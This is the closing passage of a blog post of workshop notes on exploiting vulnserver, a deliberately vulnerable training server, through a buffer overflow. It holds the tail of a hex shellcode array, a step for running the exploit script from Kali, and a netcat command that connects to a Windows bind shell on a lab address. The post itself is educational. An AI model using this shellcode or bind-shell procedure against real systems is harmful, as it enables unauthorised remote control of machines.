"\xf3\x6e\xd9\x07\x82\x5c\xda\x51\x8b\x88\xac\xbd\x3a\x65\xe9"
"\xc2\xf3\xe1\xfd\xbb\xe9\x91\x02\x16\xaa\xa2\x48\x3a\x9b\x2a"
"\x15\xaf\x99\x36\xa6\x1a\xdd\x4e\x25\xae\x9e\xb4\x35\xdb\x9b"
"\xf1\xf1\x30\xd6\x6a\x94\x36\x45\x8a\xbd";

Final test

Exit the debugger, run vulnserver in the victim's machine, then run the exploit script in Kali.

After 5 seconds, connect to the remote machine via port 9999 and you should be able to connect to the Windows bind shell:

nc 172.16.202.133  9999

Here's the complete exp.py file: https://drive.google.com/file/d/1lqnOAvZAnDs4fvJqaYSU20l-DcXMqqmH/viewhttps://pastebin.com/fAh45H3T


Thoughts

It was a fun hands-on workshop that allows me to practice some advanced pentest technique, writing shellcodes and debugging. This workshop requires a basic understanding of buffer overflow and the different registers in assembly language as pre-requisite knowledge.

Arnold was a very patient instructor and helped all participants with varying skill levels to understand the concepts.

As a disclaimer, I might have skipped some steps or explanations in this post, but this by no means was meant to be a thorough walkthrough. It only serves its purpose as my personal notes so that I can remember what I learned during the workshop.

Please read the original tutorial in Anthony's blog here for more holistic view of the technique and feel free to contact him if you wish to attend similar workshops in the future.

This post is also available on DEV.